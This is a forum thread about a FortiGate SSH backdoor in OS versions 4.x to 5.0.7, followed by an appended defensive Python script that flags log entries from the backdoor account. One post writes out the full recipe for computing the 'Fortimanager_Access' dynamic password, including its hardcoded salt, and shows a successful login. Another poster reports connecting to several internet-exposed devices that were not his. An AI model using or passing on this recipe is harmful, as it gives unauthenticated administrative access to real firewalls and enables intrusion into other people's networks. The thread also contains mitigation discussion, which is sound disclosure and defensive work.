Fortinet Forum
New Contributor

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7



I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.


New Contributor

Are there any comments from the Fortinet technical team on it? Very keen to know.


The guy here on Twitter confirms that he has the backdoor working.





I have tried the script out there and have not been able to get it to work.  Until we get some answer from Fortinet I'm going to keep at it.

Network Engineer

Tried it on a 5.0.7 version and it works.

The script logs in without any password prompt

Valued Contributor

Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...


~/Desktop $ ./
FortiGate-VM64 # get sys status
Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FGVMEV0000000000

Valued Contributor

I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...


I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).


Thanks for sharing Mike.


I've got mixed results. This one works:

Version: FortiGate-VM64 v5.0,build0128,121101 (GA)


But I was unable to access my FG-111C:

Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)


Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.


For those who don't want to dig too deep into this.


This is all the magic:


If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.

Then you can calculate the dynamic password based on this dword challenge:


n = $SSH_Challenge
m = $SHA1_Generator


m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())




login as: Fortimanager_Access


Using keyboard-interactive authentication. -840056459


Access denied


Using keyboard-interactive authentication. -1914958026


Access denied


Using keyboard-interactive authentication. -1378285763




FortiGate-VM64 #



This only works if you have SSH access. So by limiting the IP ranges for all admin users, you can mitigate the threat.

Esteemed Contributor III

If you enable an SSH key it seems like it results in a fix. Can anybody confirm this on their FGT? (Upload an SSH key from the CLI and retest.)






Like this?


login as: admin
Authenticating with public key "rsa-key-20160113"

FortiGate-VM64 # conf sys admin

FortiGate-VM64 (admin) # show

config system admin

  edit "admin"

     set accprofile "super_admin"

     set vdom "root"

     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"

     config dashboard-tabs



     config dashboard



     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=



FortiGate-VM64 (admin) #


Still able to access with the FortiManager user.
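
Added example, not part of the forum thread or Fortinet's code: a posted reply reports that the only log entry seen was a config change attributed to user Fortimanager_Access, and another suggests limiting admin IP ranges, so this sketch sweeps exported event logs for that user name and for admin sessions from outside trusted ranges. The key=value line layout, the `ui`, `action` and `msg` field names, the sample lines and the trusted network are all constructed assumptions.

```python
import ipaddress
import re

BACKDOOR_USER = "Fortimanager_Access"   # account name quoted in the thread
# Assumption: management networks that are allowed to administer the device.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample lines in a key=value event-log style; the field names
# (user, ui, action, msg) are assumptions, not copied from a real device.
SAMPLE_LOG = '''\
date=2016-01-13 time=09:14:02 type=event subtype=system user="admin" ui="ssh(10.20.0.5)" action=login msg="Administrator admin logged in"
date=2016-01-13 time=09:31:47 type=event subtype=system user="Fortimanager_Access" ui="ssh(203.0.113.77)" action=edit msg="Edit system.admin admin"
date=2016-01-13 time=09:40:10 type=event subtype=system user="Fortimanager_Access" ui="ssh(10.20.0.9)" action=edit msg="Edit system.global"
date=2016-01-13 time=10:02:33 type=event subtype=system user="ops" ui="https(198.51.100.4)" action=login msg="Administrator ops logged in"
'''

PAIR = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
UI_IP = re.compile(r'\(([0-9a-fA-F:.]+)\)')

def parse_line(line):
    """Split one key=value log line into a dict, unquoting quoted values."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in PAIR.findall(line)}

def source_ip(event):
    """Return the address inside ui="ssh(a.b.c.d)", or None if absent/invalid."""
    m = UI_IP.search(event.get("ui", ""))
    try:
        return ipaddress.ip_address(m.group(1)) if m else None
    except ValueError:
        return None

def triage(log_text, trusted=TRUSTED_NETS):
    """Yield (severity, reason, event); the thread's account always ranks highest."""
    for line in filter(None, map(str.strip, log_text.splitlines())):
        ev = parse_line(line)
        ip = source_ip(ev)
        outside = ip is not None and not any(ip in net for net in trusted)
        if ev.get("user") == BACKDOOR_USER:
            yield ("critical" if outside or ip is None else "high",
                   "activity by " + BACKDOOR_USER, ev)
        elif outside:
            yield ("medium", "admin session from outside trusted nets", ev)

def findings(log_text=SAMPLE_LOG):
    return [(sev, ev["time"], ev.get("ui", "")) for sev, _, ev in triage(log_text)]

if __name__ == "__main__":
    for row in findings():
        print(*row)
```

Because the same reply says the SSH connection itself left no log entry, a sweep like this only catches sessions that went on to change configuration; connection records from an upstream firewall or flow collector are needed to cover the rest.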